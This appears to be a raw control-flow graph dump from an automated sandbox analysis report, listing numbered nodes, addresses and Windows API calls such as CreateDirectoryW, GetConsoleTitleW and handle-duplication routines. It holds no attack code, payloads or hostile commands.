7ff64b57291c 8 API calls 19690->19692 19693 7ff64b567b36 19691->19693 19694 7ff64b567ae3 19692->19694 19695 7ff64b567b3e GetFullPathNameW 19693->19695 19717 7ff64b57ae4e 19693->19717 19694->19689 19696 7ff64b57ae3a 19694->19696 19697 7ff64b57ae55 GetLastError 19695->19697 19698 7ff64b567b73 19695->19698 19699 7ff64b563278 166 API calls 19696->19699 19697->19717 19700 7ff64b57ae68 19698->19700 19701 7ff64b567b7e CreateDirectoryW 19698->19701 19702 7ff64b57ae44 19699->19702 19707 7ff64b563278 166 API calls 19700->19707 19704 7ff64b567b93 19701->19704 19705 7ff64b567bdf GetLastError 19701->19705 19703 7ff64b567bb5 19702->19703 19709 7ff64b578f80 7 API calls 19703->19709 19704->19703 19708 7ff64b567ba9 free 19704->19708 19705->19700 19714 7ff64b567bf8 19705->19714 19706 7ff64b563278 166 API calls 19710 7ff64b57af6b 19706->19710 19719 7ff64b57ae7e 19707->19719 19708->19703 19711 7ff64b567bc6 19709->19711 19711->19669 19712 7ff64b567cd1 CreateDirectoryW 19712->19704 19713 7ff64b567cf3 19712->19713 19715 7ff64b57af46 GetLastError 19713->19715 19714->19712 19716 7ff64b567c52 CreateDirectoryW 19714->19716 19714->19717 19718 7ff64b567c8f 19714->19718 19714->19719 19721 7ff64b567cca 19714->19721 19715->19704 19715->19717 19716->19718 19720 7ff64b567c7b GetLastError 19716->19720 19717->19706 19718->19714 19718->19716 19719->19712 19719->19717 19722 7ff64b57af3d 19719->19722 19720->19717 19720->19718 19721->19712 19722->19715 22445 7ff64b566be0 22446 7ff64b56cd90 166 API calls 22445->22446 22447 7ff64b566c04 22446->22447 22448 7ff64b566c13 _pipe 22447->22448 22449 7ff64b5841a2 22447->22449 22452 7ff64b566c32 22448->22452 22482 7ff64b566e26 22448->22482 22451 7ff64b563278 166 API calls 22449->22451 22450 7ff64b563278 166 API calls 22450->22449 22453 7ff64b5841bc 22451->22453 22455 7ff64b566df1 22452->22455 22496 7ff64b56affc _dup 22452->22496 22454 7ff64b58e91c 198 API calls 22453->22454 22456 7ff64b5841c1 22454->22456 22459 7ff64b563278 166 API calls 22456->22459 22458 7ff64b566c7d 22458->22449 22462 7ff64b56b038 _dup2 22458->22462 22460 7ff64b5841d2 22459->22460 22461 7ff64b58e91c 198 API calls 22460->22461 22463 7ff64b5841d7 22461->22463 22464 7ff64b566c93 22462->22464 22465 7ff64b563278 166 API calls 22463->22465 22464->22463 22466 7ff64b56d208 _close 22464->22466 22467 7ff64b5841e4 22465->22467 22468 7ff64b566ca4 22466->22468 22469 7ff64b58e91c 198 API calls 22467->22469 22498 7ff64b56be00 22468->22498 22472 7ff64b5841e9 22469->22472 22473 7ff64b566d07 22475 7ff64b56b038 _dup2 22473->22475 22474 7ff64b566ccf _get_osfhandle DuplicateHandle 22474->22473 22476 7ff64b566d11 22475->22476 22476->22463 22477 7ff64b56d208 _close 22476->22477 22478 7ff64b566d22 22477->22478 22479 7ff64b566e21 22478->22479 22481 7ff64b56affc _dup 22478->22481 22480 7ff64b58e91c 198 API calls 22479->22480 22480->22482 22483 7ff64b566d57 22481->22483 22482->22450 22483->22456 22484 7ff64b56b038 _dup2 22483->22484 22485 7ff64b566d6c 22484->22485 22485->22463 22486 7ff64b56d208 _close 22485->22486 22487 7ff64b566d7c 22486->22487 22488 7ff64b56be00 659 API calls 22487->22488 22489 7ff64b566d9c 22488->22489 22490 7ff64b56b038 _dup2 22489->22490 22491 7ff64b566da8 22490->22491 22491->22463 22492 7ff64b56d208 _close 22491->22492 22493 7ff64b566db9 22492->22493 22493->22479 22494 7ff64b566dc1 22493->22494 22494->22455 22535 7ff64b566e60 22494->22535 22497 7ff64b56b018 22496->22497 22497->22458 22499 7ff64b566cc4 22498->22499 22500 7ff64b56be1b 22498->22500 22499->22473 22499->22474 22500->22499 22501 7ff64b56be67 22500->22501 22502 7ff64b56be47 memset 22500->22502 22504 7ff64b56be73 22501->22504 22506 7ff64b56bf29 22501->22506 22507 7ff64b56beaf 22501->22507 22585 7ff64b56bff0 22502->22585 22505 7ff64b56be92 22504->22505 22509 7ff64b56bf0c 22504->22509 22516 7ff64b56bea1 22505->22516 22539 7ff64b56c620 GetConsoleTitleW 22505->22539 22508 7ff64b56cd90 166 API calls 22506->22508 22507->22499 22513 7ff64b56bff0 185 API calls 22507->22513 22511 7ff64b56bf33 22508->22511 22623 7ff64b56b0d8 memset 22509->22623 22511->22507 22514 7ff64b56bf9e 22511->22514 22517 7ff64b5688a8 _wcsicmp 22511->22517 22513->22499 22712 7ff64b5671ec 22514->22712 22516->22507 22521 7ff64b56af98 2 API calls 22516->22521 22520 7ff64b56bf5a 22517->22520 22518 7ff64b56bf1e 22518->22507 22520->22514 22523 7ff64b56bf5f 22520->22523 22521->22507 22522 7ff64b56bfa9 22522->22507 22524 7ff64b56cd90 166 API calls 22522->22524 22525 7ff64b570a6c 273 API calls 22523->22525 22526 7ff64b56bfbb 22524->22526 22527 7ff64b56bf70 22525->22527 22526->22507 22528 7ff64b56bfc7 22526->22528 22527->22514 22529 7ff64b56bf75 22527->22529 22530 7ff64b57081c 166 API calls 22528->22530 22531 7ff64b56b0d8 194 API calls 22529->22531 22530->22529 22532 7ff64b56bf7f 22531->22532 22532->22507 22683 7ff64b575ad8 22532->22683 22537 7ff64b566e6d 22535->22537 22536 7ff64b566eb9 22536->22455 22537->22536 22538 7ff64b575cb4 7 API calls 22537->22538 22538->22537 22541 7ff64b56c675 22539->22541 22545 7ff64b56ca2f 22539->22545 22540 7ff64b57c5fc GetLastError 22540->22545 22542 7ff64b56ca40 17 API calls 22541->22542 22553 7ff64b56c69b 22542->22553 22543 7ff64b563278 166 API calls 22543->22545 22544 7ff64b57855c ??_V@YAXPEAX 22544->22545 22545->22540 22545->22543 22545->22544 22546 7ff64b56c9b5 22550 7ff64b57855c ??_V@YAXPEAX 22546->22550 22547 7ff64b5689c0 23 API calls 22551 7ff64b56c94a 22547->22551 22548 7ff64b56c978 towupper 22548->22551 22549 7ff64b57855c ??_V@YAXPEAX 22577 7ff64b56c762 22549->22577 22552 7ff64b56c862 22550->22552 22551->22540 22551->22545 22551->22546 22551->22547 22551->22548 22551->22551 22555 7ff64b58ec14 173 API calls 22551->22555 22570 7ff64b57291c 8 API calls 22551->22570 22574 7ff64b57c684 22551->22574 22551->22577 22581 7ff64b56ca16 GetLastError 22551->22581 22557 7ff64b56c872 22552->22557 22560 7ff64b57c6b8 SetConsoleTitleW 22552->22560 22553->22545 22553->22546 22553->22551 22554 7ff64b56d3f0 223 API calls 22553->22554 22553->22577 22556 7ff64b56c741 22554->22556 22555->22577 22558 7ff64b56c74d 22556->22558 22561 7ff64b56c8b5 wcsncmp 22556->22561 22559 7ff64b57855c ??_V@YAXPEAX 22557->22559 22564 7ff64b56bd38 207 API calls 22558->22564 22558->22577 22562 7ff64b56c87c 22559->22562 22560->22557 22561->22558 22561->22577 22565 7ff64b578f80 7 API calls 22562->22565 22563 7ff64b56c83d 22718 7ff64b56cb40 22563->22718 22564->22577 22567 7ff64b56c88e 22565->22567 22567->22516 22568 7ff64b56c78a wcschr 22568->22577 22570->22551 22571 7ff64b56c855 22722 7ff64b567a70 22571->22722 22572 7ff64b56ca25 22575 7ff64b563278 166 API calls 22572->22575 22576 7ff64b563278 166 API calls 22574->22576 22575->22545 22578 7ff64b57c675 22576->22578 22577->22545 22577->22549 22577->22551 22577->22563 22577->22568 22577->22572 22579 7ff64b56ca2a 22577->22579 22578->22545 22580 7ff64b579158 7 API calls 22579->22580 22580->22545 22583 7ff64b563278 166 API calls 22581->22583 22583->22578 22586 7ff64b56c01c 22585->22586 22608 7ff64b56c0c4 22585->22608 22587 7ff64b56c086 22586->22587 22588 7ff64b56c022 22586->22588 22591 7ff64b56c144 22587->22591 22592 7ff64b56c094 22587->22592 22589 7ff64b56c113 22588->22589 22590 7ff64b56c030 22588->22590 22594 7ff64b56c053 22589->22594 22599 7ff64b56ff70 2 API calls 22589->22599 22593 7ff64b56c039 wcschr 22590->22593 22590->22594 22595 7ff64b56c151 22591->22595 22621 7ff64b56c1c8 22591->22621 22602 7ff64b56c460 183 API calls 22592->22602 22592->22608 22593->22594 22596 7ff64b56c301 22593->22596 22597 7ff64b56c058 22594->22597 22598 7ff64b56c0c6 22594->22598 22619 7ff64b56c211 22594->22619 22737 7ff64b56c460 22595->22737 22600 7ff64b56cd90 166 API calls 22596->22600 22605 7ff64b56ff70 2 API calls 22597->22605 22611 7ff64b56c073 22597->22611 22603 7ff64b56c0cf wcschr 22598->22603 22598->22611 22599->22594 22622 7ff64b56c30b 22600->22622 22602->22592 22604 7ff64b56c1be 22603->22604 22603->22611 22606 7ff64b56cd90 166 API calls 22604->22606 22605->22611 22606->22621 22608->22501 22609 7ff64b56c460 183 API calls 22609->22611 22610 7ff64b56c460 183 API calls 22610->22608 22611->22608 22611->22609 22612 7ff64b56c285 22617 7ff64b56b6b0 170 API calls 22612->22617 22612->22619 22613 7ff64b56b6b0 170 API calls 22613->22594 22614 7ff64b56d840 178 API calls 22614->22622 22615 7ff64b56ff70 2 API calls 22615->22608 22616 7ff64b56d840 178 API calls 22616->22621 22620 7ff64b56c2ac 22617->22620 22618 7ff64b56c3d4 22618->22611 22618->22613 22618->22619 22619->22615 22620->22611 22620->22619 22621->22608 22621->22612 22621->22616 22621->22619 22622->22608 22622->22614 22622->22618 22622->22619 22624 7ff64b56ca40 17 API calls 22623->22624 22640 7ff64b56b162 22624->22640 22625 7ff64b56b2e1 22627 7ff64b56b2f7 ??_V@YAXPEAX 22625->22627 22628 7ff64b56b303 22625->22628 22626 7ff64b56b1d9 22632 7ff64b56cd90 166 API calls 22626->22632 22647 7ff64b56b1ed 22626->22647 22627->22628 22630 7ff64b578f80 7 API calls 22628->22630 22629 7ff64b571ea0 8 API calls 22629->22640 22631 7ff64b56b315 22630->22631 22631->22505 22631->22518 22632->22647 22634 7ff64b56b228 _get_osfhandle 22636 7ff64b56b23f _get_osfhandle 22634->22636 22634->22647 22635 7ff64b57bfef _get_osfhandle SetFilePointer 22637 7ff64b57c01d 22635->22637 22635->22647 22636->22647 22639 7ff64b5733f0 _vsnwprintf 22637->22639 22638 7ff64b56affc _dup 22638->22647 22642 7ff64b57c038 22639->22642 22640->22625 22640->22626 22640->22629 22640->22640 22641 7ff64b5701b8 6 API calls 22641->22647 22646 7ff64b563278 166 API calls 22642->22646 22643 7ff64b57c1c3 22644 7ff64b5733f0 _vsnwprintf 22643->22644 22644->22642 22645 7ff64b56d208 _close 22645->22647 22648 7ff64b57c1f9 22646->22648 22647->22625 22647->22634 22647->22635 22647->22638 22647->22641 22647->22643 22647->22645 22649 7ff64b57c060 22647->22649 22651 7ff64b56b038 _dup2 22647->22651 22652 7ff64b57c246 22647->22652 22656 7ff64b5726e0 19 API calls 22647->22656 22660 7ff64b56b356 22647->22660 22682 7ff64b57c1a5 22647->22682 22751 7ff64b58f318 _get_osfhandle GetFileType 22647->22751 22650 7ff64b56af98 2 API calls 22648->22650 22649->22652 22653 7ff64b5709f4 2 API calls 22649->22653 22650->22625 22651->22647 22654 7ff64b56af98 2 API calls 22652->22654 22657 7ff64b57c084 22653->22657 22658 7ff64b57c24b 22654->22658 22655 7ff64b56b038 _dup2 22659 7ff64b57c1b7 22655->22659 22656->22647 22661 7ff64b56b900 166 API calls 22657->22661 22662 7ff64b58f1d8 166 API calls 22658->22662 22663 7ff64b57c207 22659->22663 22664 7ff64b57c1be 22659->22664 22668 7ff64b56af98 2 API calls 22660->22668 22666 7ff64b57c08c 22661->22666 22662->22625 22667 7ff64b56d208 _close 22663->22667 22665 7ff64b56d208 _close 22664->22665 22665->22643 22669 7ff64b57c094 wcsrchr 22666->22669 22678 7ff64b57c0ad 22666->22678 22667->22660 22670 7ff64b57c211 22668->22670 22669->22678 22671 7ff64b5733f0 _vsnwprintf 22670->22671 22672 7ff64b57c22c 22671->22672 22673 7ff64b563278 166 API calls 22672->22673 22673->22625 22674 7ff64b57c106 22675 7ff64b56ff70 2 API calls 22674->22675 22677 7ff64b57c13b 22675->22677 22676 7ff64b57c0e0 _wcsnicmp 22676->22678 22677->22652 22679 7ff64b57c146 SearchPathW 22677->22679 22678->22674 22678->22676 22679->22652 22680 7ff64b57c188 22679->22680 22681 7ff64b5726e0 19 API calls 22680->22681 22681->22682 22682->22655 22684 7ff64b56cd90 166 API calls 22683->22684 22685 7ff64b575b12 22684->22685 22686 7ff64b56cb40 166 API calls 22685->22686 22711 7ff64b575b8b 22685->22711 22688 7ff64b575b26 22686->22688 22687 7ff64b578f80 7 API calls 22689 7ff64b56bf99 22687->22689 22690 7ff64b570a6c 273 API calls 22688->22690 22688->22711 22689->22516 22691 7ff64b575b43 22690->22691 22692 7ff64b575bb8 22691->22692 22693 7ff64b575b48 GetConsoleTitleW 22691->22693 22695 7ff64b575bbd GetConsoleTitleW 22692->22695 22696 7ff64b575bf4 22692->22696 22694 7ff64b56cad4 172 API calls 22693->22694 22697 7ff64b575b66 22694->22697 22700 7ff64b56cad4 172 API calls 22695->22700 22698 7ff64b575bfd 22696->22698 22699 7ff64b57f452 22696->22699 22752 7ff64b574224 InitializeProcThreadAttributeList 22697->22752 22705 7ff64b575c1b 22698->22705 22706 7ff64b57f462 22698->22706 22698->22711 22702 7ff64b573c24 166 API calls 22699->22702 22703 7ff64b575bdb 22700->22703 22702->22711 22809 7ff64b5696e8 22703->22809 22708 7ff64b563278 166 API calls 22705->22708 22709 7ff64b563278 166 API calls 22706->22709 22708->22711 22709->22711 22710 7ff64b575c3c SetConsoleTitleW 22710->22711 22711->22687 22713 7ff64b567211 _setjmp 22712->22713 22717 7ff64b567279 22712->22717 22715 7ff64b567265 22713->22715 22713->22717 23015 7ff64b5672b0 22715->23015 22717->22522 22719 7ff64b56cb63 22718->22719 22720 7ff64b56cd90 166 API calls 22719->22720 22721 7ff64b56c848 22720->22721 22721->22571 22725 7ff64b56cad4 22721->22725 22723 7ff64b567d30 273 API calls 22722->22723 22724 7ff64b567a8a 22723->22724 22724->22552 22726 7ff64b56cb05 22725->22726 22727 7ff64b56cad9 22725->22727 22726->22571 22727->22726 22728 7ff64b56cd90 166 API calls 22727->22728 22729 7ff64b57c722 22728->22729 22729->22726 22730 7ff64b57c72e GetConsoleTitleW 22729->22730 22730->22726 22731 7ff64b57c74a 22730->22731 22732 7ff64b56b6b0 170 API calls 22731->22732 22735 7ff64b57c778 22732->22735 22733 7ff64b57c7ec 22734 7ff64b56ff70 2 API calls 22733->22734 22734->22726 22735->22733 22736 7ff64b57c7dd SetConsoleTitleW 22735->22736 22736->22733 22738 7ff64b56c4c9 22737->22738 22739 7ff64b56c486 22737->22739 22742 7ff64b56ff70 2 API calls 22738->22742 22744 7ff64b56c161 22738->22744 22740 7ff64b56c48e wcschr 22739->22740 22739->22744 22741 7ff64b56c4ef 22740->22741 22740->22744 22743 7ff64b56cd90 166 API calls 22741->22743 22742->22744 22750 7ff64b56c4f9 22743->22750 22744->22608 22744->22610 22745 7ff64b56c5bd 22746 7ff64b56c541 22745->22746 22749 7ff64b56b6b0 170 API calls 22745->22749 22746->22744 22748 7ff64b56ff70 2 API calls 22746->22748 22747 7ff64b56d840 178 API calls 22747->22750 22748->22744 22749->22746 22750->22744 22750->22745 22750->22746 22750->22747 22751->22647 22753 7ff64b5742ab UpdateProcThreadAttribute 22752->22753 22754 7ff64b57ecd4 GetLastError 22752->22754 22756 7ff64b5742eb memset memset GetStartupInfoW 22753->22756 22757 7ff64b57ecf0 GetLastError 22753->22757 22755 7ff64b57ecee 22754->22755 22759 7ff64b573a90 170 API calls 22756->22759 22846 7ff64b589eec 22757->22846 22761 7ff64b5743a8 22759->22761 22762 7ff64b56b900 166 API calls 22761->22762 22763 7ff64b5743bb 22762->22763 22764 7ff64b5743cc 22763->22764 22765 7ff64b574638 _local_unwind 22763->22765 22766 7ff64b574415 22764->22766 22767 7ff64b5743de wcsrchr 22764->22767 22765->22764 22833 7ff64b575a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22766->22833 22767->22766 22768 7ff64b5743f7 lstrcmpW 22767->22768 22768->22766 22770 7ff64b574668 22768->22770 22834 7ff64b589044 22770->22834 22826 7ff64b569737 22809->22826 22811 7ff64b56977d memset 22813 7ff64b56ca40 17 API calls 22811->22813 22812 7ff64b56cd90 166 API calls 22812->22826 22813->22826 22814 7ff64b57b76e 22816 7ff64b563278 166 API calls 22814->22816 22815 7ff64b57b7b3 22818 7ff64b57b787 22816->22818 22817 7ff64b57b79a 22820 7ff64b57855c ??_V@YAXPEAX 22817->22820 22821 7ff64b57b795 22818->22821 22822 7ff64b58e944 393 API calls 22818->22822 22819 7ff64b56b364 17 API calls 22819->22826 22820->22815 22931 7ff64b587694 22821->22931 22822->22821 22826->22811 22826->22812 22826->22814 22826->22815 22826->22817 22826->22819 22827 7ff64b5696b4 186 API calls 22826->22827 22828 7ff64b56986d 22826->22828 22848 7ff64b571fac memset 22826->22848 22875 7ff64b56ce10 22826->22875 22925 7ff64b575920 22826->22925 22827->22826 22829 7ff64b56988c 22828->22829 22830 7ff64b569880 ??_V@YAXPEAX 22828->22830 22831 7ff64b578f80 7 API calls 22829->22831 22830->22829 22832 7ff64b56989d 22831->22832 22832->22710 22835 7ff64b573a90 170 API calls 22834->22835 22836 7ff64b589064 22835->22836 22837 7ff64b58906e 22836->22837 22838 7ff64b589083 22836->22838 22839 7ff64b57498c 8 API calls 22837->22839 22841 7ff64b56cd90 166 API calls 22838->22841 22840 7ff64b589081 22839->22840 22840->22766 22842 7ff64b58909b 22841->22842 22842->22840 22843 7ff64b57498c 8 API calls 22842->22843 22844 7ff64b5890ec 22843->22844 22845 7ff64b56ff70 2 API calls 22844->22845 22845->22840 22847 7ff64b57ed0a DeleteProcThreadAttributeList 22846->22847 22847->22755 22849 7ff64b57203b 22848->22849 22850 7ff64b5720b0 22849->22850 22852 7ff64b572094 22849->22852 22851 7ff64b573060 171 API calls 22850->22851 22853 7ff64b57211c 22850->22853 22851->22853 22854 7ff64b5720a6 22852->22854 22855 7ff64b563278 166 API calls 22852->22855 22853->22854 22856 7ff64b572e44 2 API calls 22853->22856 22857 7ff64b578f80 7 API calls 22854->22857 22855->22854 22859 7ff64b572148 22856->22859 22858 7ff64b572325 22857->22858 22858->22826 22859->22854 22860 7ff64b572d70 3 API calls 22859->22860 22861 7ff64b5721af 22860->22861 22862 7ff64b56b900 166 API calls 22861->22862 22864 7ff64b5721d0 22862->22864 22863 7ff64b57e04a ??_V@YAXPEAX 22863->22854 22864->22863 22865 7ff64b57221c wcsspn 22864->22865 22866 7ff64b5722a4 ??_V@YAXPEAX 22864->22866 22868 7ff64b56b900 166 API calls 22865->22868 22866->22854 22869 7ff64b57223b 22868->22869 22869->22863 22870 7ff64b572252 22869->22870 22871 7ff64b57228f 22870->22871 22873 7ff64b57e06d wcschr 22870->22873 22874 7ff64b57e090 towupper 22870->22874 22872 7ff64b56d3f0 223 API calls 22871->22872 22872->22866 22873->22870 22874->22870 22874->22871 22888 7ff64b56d0f8 22875->22888 22921 7ff64b56ce5b 22875->22921 22876 7ff64b578f80 7 API calls 22879 7ff64b56d10a 22876->22879 22877 7ff64b57c860 22878 7ff64b57c97c 22877->22878 22881 7ff64b58ee88 390 API calls 22877->22881 22880 7ff64b58e9b4 197 API calls 22878->22880 22879->22826 22883 7ff64b57c981 longjmp 22880->22883 22884 7ff64b57c879 22881->22884 22882 7ff64b570494 182 API calls 22882->22921 22885 7ff64b57c99a 22883->22885 22886 7ff64b57c95c 22884->22886 22887 7ff64b57c882 EnterCriticalSection LeaveCriticalSection 22884->22887 22885->22888 22890 7ff64b57c9b3 ??_V@YAXPEAX 22885->22890 22886->22878 22893 7ff64b5696b4 186 API calls 22886->22893 22892 7ff64b56d0e3 22887->22892 22888->22876 22890->22888 22892->22826 22893->22886 22894 7ff64b56d208 _close 22894->22921 22895 7ff64b56cd90 166 API calls 22895->22921 22896 7ff64b57c9d5 22897 7ff64b58d610 167 API calls 22896->22897 22899 7ff64b57c9da 22897->22899 22898 7ff64b56b900 166 API calls 22898->22921 22900 7ff64b57ca07 22899->22900 22902 7ff64b58bfec 176 API calls 22899->22902 22901 7ff64b58e91c 198 API calls 22900->22901 22906 7ff64b57ca0c 22901->22906 22903 7ff64b57c9f1 22902->22903 22904 7ff64b563240 166 API calls 22903->22904 22904->22900 22905 7ff64b56cf33 memset 22905->22921 22906->22826 22907 7ff64b56ca40 17 API calls 22907->22921 22908 7ff64b56d184 wcschr 22908->22921 22909 7ff64b58bfec 176 API calls 22909->22921 22910 7ff64b57c9c9 22912 7ff64b57855c ??_V@YAXPEAX 22910->22912 22911 7ff64b56d1a7 wcschr 22911->22921 22912->22888 22913 7ff64b58778c 166 API calls 22913->22921 22914 7ff64b570a6c 273 API calls 22914->22921 22915 7ff64b56be00 647 API calls 22915->22921 22916 7ff64b573448 166 API calls 22916->22921 22917 7ff64b56cfab _wcsicmp 22917->22921 22918 7ff64b570580 12 API calls 22919 7ff64b56d003 GetConsoleOutputCP GetCPInfo 22918->22919 22920 7ff64b5704f4 3 API calls 22919->22920 22920->22921 22921->22877 22921->22882 22921->22885 22921->22888 22921->22892 22921->22895 22921->22896 22921->22898 22921->22905 22921->22907 22921->22908 22921->22909 22921->22910 22921->22911 22921->22913 22921->22914 22921->22915 22921->22916 22921->22917 22921->22918 22923 7ff64b571fac 238 API calls 22921->22923 22924 7ff64b56d044 ??_V@YAXPEAX 22921->22924 22937 7ff64b56df60 22921->22937 22957 7ff64b58c738 22921->22957 22923->22921 22924->22921 22926 7ff64b575a12 22925->22926 22927 7ff64b57596c 22925->22927 22926->22826 22927->22926 22928 7ff64b57598d VirtualQuery 22927->22928 22928->22926 22930 7ff64b5759ad 22928->22930 22929 7ff64b5759b7 VirtualQuery 22929->22926 22929->22930 22930->22926 22930->22929 22933 7ff64b5876a3 22931->22933 22932 7ff64b5876b7 22934 7ff64b58e9b4 197 API calls 22932->22934 22933->22932 22935 7ff64b5696b4 186 API calls 22933->22935 22936 7ff64b5876bc longjmp 22934->22936 22935->22933 22938 7ff64b56dfe2 22937->22938 22939 7ff64b56df93 22937->22939 22941 7ff64b56e100 VirtualFree 22938->22941 22942 7ff64b56e00b _setjmp 22938->22942 22939->22938 22940 7ff64b56df9f GetProcessHeap RtlFreeHeap 22939->22940 22940->22938 22940->22939 22941->22938 22943 7ff64b56e04a 22942->22943 22944 7ff64b56ceaa _tell 22942->22944 22945 7ff64b56e600 473 API calls 22943->22945 22944->22894 22946 7ff64b56e073 22945->22946 22947 7ff64b56e0e0 longjmp 22946->22947 22948 7ff64b56e081 22946->22948 22956 7ff64b56e0b0 22947->22956 22949 7ff64b56d250 475 API calls 22948->22949 22950 7ff64b56e086 22949->22950 22952 7ff64b56e600 473 API calls 22950->22952 22950->22956 22954 7ff64b56e0a7 22952->22954 22955 7ff64b58d610 167 API calls 22954->22955 22954->22956 22955->22956 22956->22944 22967 7ff64b58d3fc 22956->22967 22958 7ff64b58c775 22957->22958 22965 7ff64b58c7ab 22957->22965 22959 7ff64b56cd90 166 API calls 22958->22959 22960 7ff64b58c781 22959->22960 22961 7ff64b58c8d4 22960->22961 22962 7ff64b56b0d8 194 API calls 22960->22962 22961->22921 22962->22961 22963 7ff64b56b6b0 170 API calls 22963->22965 22964 7ff64b56b038 _dup2 22964->22965 22965->22960 22965->22961 22965->22963 22965->22964 22966 7ff64b56d208 _close 22965->22966 22966->22965 22982 7ff64b58d419 22967->22982 22968 7ff64b57cadf 22969 7ff64b58d576 22970 7ff64b58d592 22969->22970 22983 7ff64b58d555 22969->22983 22972 7ff64b573448 166 API calls 22970->22972 22971 7ff64b58d5c4 22974 7ff64b573448 166 API calls 22971->22974 22976 7ff64b58d5a5 22972->22976 22973 7ff64b58d541 22973->22970 22978 7ff64b58d546 22973->22978 22974->22968 22979 7ff64b58d5ba 22976->22979 22980 7ff64b573448 166 API calls 22976->22980 22977 7ff64b573448 166 API calls 22977->22982 22978->22971 22978->22983 22985 7ff64b58d36c 22979->22985 22980->22979 22982->22968 22982->22969 22982->22970 22982->22971 22982->22973 22982->22977 22982->22983 22984 7ff64b58d3fc 166 API calls 22982->22984 22992 7ff64b58d31c 22983->22992 22984->22982 22986 7ff64b58d381 22985->22986 22987 7ff64b58d3d8 22985->22987 22988 7ff64b5734a0 166 API calls 22986->22988 22991 7ff64b58d390 22988->22991 22989 7ff64b573448 166 API calls 22989->22991 22990 7ff64b5734a0 166 API calls 22990->22991 22991->22987 22991->22989 22991->22990 22991->22991 22993 7ff64b573448 166 API calls 22992->22993 22994 7ff64b58d33b 22993->22994 22995 7ff64b58d36c 166 API calls 22994->22995 22996 7ff64b58d343 22995->22996 22997 7ff64b58d3fc 166 API calls 22996->22997 23014 7ff64b58d34e 22997->23014 22998 7ff64b58d5c2 22998->22968 22999 7ff64b58d576 23000 7ff64b58d592 22999->23000 23012 7ff64b58d555 22999->23012 23002 7ff64b573448 166 API calls 23000->23002 23001 7ff64b58d5c4 23004 7ff64b573448 166 API calls 23001->23004 23006 7ff64b58d5a5 23002->23006 23003 7ff64b58d541 23003->23000 23008 7ff64b58d546 23003->23008 23004->22998 23005 7ff64b58d31c 166 API calls 23005->22998 23009 7ff64b58d5ba 23006->23009 23010 7ff64b573448 166 API calls 23006->23010 23007 7ff64b573448 166 API calls 23007->23014 23008->23001 23008->23012 23011 7ff64b58d36c 166 API calls 23009->23011 23010->23009 23011->22998 23012->23005 23013 7ff64b58d3fc 166 API calls 23013->23014 23014->22998 23014->22999 23014->23000 23014->23001 23014->23003 23014->23007 23014->23012 23014->23013 23016 7ff64b584621 23015->23016 23017 7ff64b5672de 23015->23017 23021 7ff64b58447b longjmp 23016->23021 23025 7ff64b584639 23016->23025 23041 7ff64b5847e0 23016->23041 23044 7ff64b58475e 23016->23044 23018 7ff64b5672eb 23017->23018 23023 7ff64b584467 23017->23023 23024 7ff64b584530 23017->23024 23076 7ff64b567348 23018->23076 23019 7ff64b567348 168 API calls 23075 7ff64b584524 23019->23075 23026 7ff64b584492 23021->23026 23023->23018 23023->23026 23035 7ff64b584475 23023->23035 23030 7ff64b567348 168 API calls 23024->23030 23028 7ff64b584695 23025->23028 23037 7ff64b58463e 23025->23037 23029 7ff64b567348 168 API calls 23026->23029 23027 7ff64b567315 23091 7ff64b5673d4 23027->23091 23034 7ff64b5673d4 168 API calls 23028->23034 23049 7ff64b5844a8 23029->23049 23056 7ff64b584549 23030->23056 23031 7ff64b5672b0 168 API calls 23039 7ff64b58480e 23031->23039 23032 7ff64b567348 168 API calls 23032->23027 23057 7ff64b58469a 23034->23057 23035->23021 23035->23028 23036 7ff64b567348 168 API calls 23036->23041 23037->23021 23042 7ff64b584654 23037->23042 23038 7ff64b5845b2 23046 7ff64b567348 168 API calls 23038->23046 23039->22717 23040 7ff64b567323 23040->22717 23041->23019 23050 7ff64b567348 168 API calls 23042->23050 23043 7ff64b58455e 23043->23038 23058 7ff64b567348 168 API calls 23043->23058 23044->23036 23045 7ff64b5846e1 23051 7ff64b5672b0 168 API calls 23045->23051 23047 7ff64b5845c7 23046->23047 23052 7ff64b567348 168 API calls 23047->23052 23048 7ff64b5844e2 23054 7ff64b5672b0 168 API calls 23048->23054 23049->23048 23053 7ff64b567348 168 API calls 23049->23053 23050->23040 23055 7ff64b584738 23051->23055 23059 7ff64b5845db 23052->23059 23053->23048 23060 7ff64b5844f1 23054->23060 23061 7ff64b567348 168 API calls 23055->23061 23056->23038 23056->23043 23064 7ff64b567348 168 API calls 23056->23064 23057->23045 23067 7ff64b5846ea 23057->23067 23068 7ff64b5846c7 23057->23068 23058->23038 23062 7ff64b567348 168 API calls 23059->23062 23063 7ff64b5672b0 168 API calls 23060->23063 23061->23075 23065 7ff64b5845ec 23062->23065 23066 7ff64b584503 23063->23066 23064->23043 23070 7ff64b567348 168 API calls 23065->23070 23066->23040 23073 7ff64b567348 168 API calls 23066->23073 23069 7ff64b567348 168 API calls 23067->23069 23068->23045 23071 7ff64b567348 168 API calls 23068->23071 23069->23045 23072 7ff64b584600 23070->23072 23071->23045 23074 7ff64b567348 168 API calls 23072->23074 23073->23075 23074->23075 23075->23031 23075->23040 23083 7ff64b56735d 23076->23083 23077 7ff64b563278 166 API calls 23078 7ff64b584820 longjmp 23077->23078 23079 7ff64b584838 23078->23079 23080 7ff64b563278 166 API calls 23079->23080 23081 7ff64b584844 longjmp 23080->23081 23082 7ff64b58485a 23081->23082 23084 7ff64b567348 166 API calls 23082->23084 23083->23077 23083->23079 23083->23083 23090 7ff64b5673ab 23083->23090 23085 7ff64b58487b 23084->23085 23086 7ff64b567348 166 API calls 23085->23086 23087 7ff64b5848ad 23086->23087 23088 7ff64b567348 166 API calls 23087->23088 23089 7ff64b5672ff 23088->23089 23089->23027 23089->23032 23092 7ff64b567401 23091->23092 23092->23040 23093 7ff64b567348 168 API calls 23092->23093 23094 7ff64b58487b 23093->23094 23095 7ff64b567348 168 API calls 23094->23095 23096 7ff64b5848ad 23095->23096 23097 7ff64b567348 168 API calls 23096->23097 23098 7ff64b5848be 23097->23098 23098->23040

                                                                              Executed Functions

                                                                              Function 00007FF64B56AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
